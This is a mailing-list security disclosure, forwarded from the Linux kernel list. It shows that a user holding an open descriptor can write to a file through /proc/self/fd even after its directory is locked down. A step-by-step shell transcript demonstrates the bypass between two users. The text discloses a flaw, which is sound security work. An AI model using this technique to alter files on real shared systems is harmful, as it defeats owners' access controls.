/proc filesystem allows bypassing directory permissions on Linux

Hi!This is forward from lkml, so no, I did not invent thishole. Unfortunately, I do not think lkml sees this as a security hole,so...Jamie Lokier said:

 a) the current permission model under /proc/PID/fd has a security    hole (which Jamie is worried about)

I believe its bugtraq time. Being able to reopen file with additionalpermissions looks like  a security problem...Jamie, do you have some test script? And do you want your 15 minutes of bugtraq fame? ;-).

The reopen does check the inode permission, but it does not requireyou have any reachable path to the file.  Someone _might_ use that asa traditional unix security mechanism, but if so it's probably quite rare.

Ok, I got this, with two users. I guess it is real (but obscure)security hole.So, we have this scenario. pavel/root is not doing anything interesting inthe background.pavel () toy:/tmp$ uname -aLinux toy.ucw.cz 2.6.32-rc3 #21 Mon Oct 19 07:32:02 CEST 2009 armv5tel GNU/Linuxpavel () toy:/tmp mkdir my_priv; cd my_privpavel () toy:/tmp/my_priv$ echo this file should never be writable > unwritable_file# lock down directorypavel () toy:/tmp/my_priv$ chmod 700 .# relax file permissions, directory is private, so this is safe# check link count on unwritable_file. We would not want someone # to have a hard link to work around our permissions, would we?pavel () toy:/tmp/my_priv$ chmod 666 unwritable_file pavel () toy:/tmp/my_priv$ cat unwritable_file this file should never be writablepavel () toy:/tmp/my_priv$ cat unwritable_file got you# Security problem here[Please pause here for a while before reading how guest did it.]Unexpected? Well, yes, to me anyway. Linux specific? Yes, I think so.So what did happen? User guest was able to work around directorypermissions in the background, using /proc filesystem.guest () toy:~$ bash 3< /tmp/my_priv/unwritable_file # Running inside nested shellguest () toy:~$ read A <&3guest () toy:~$ echo $Athis file should never be writableguest () toy:~$ cd /tmp/my_privguest () toy:/tmp/my_priv$ lsunwritable_file# pavel did chmod 000, chmod 666 hereguest () toy:/tmp/my_priv$ lsls: cannot open directory .: Permission denied# Linux correctly prevents guest from writing to that fileguest () toy:/tmp/my_priv$ cat unwritable_filecat: unwritable_file: Permission deniedguest () toy:/tmp/my_priv$ echo got you >&3bash: echo: write error: Bad file descriptor# ...until we take a way around it with /proc filesystem. Oops.guest () toy:/tmp/my_priv$ echo got you > /proc/self/fd/3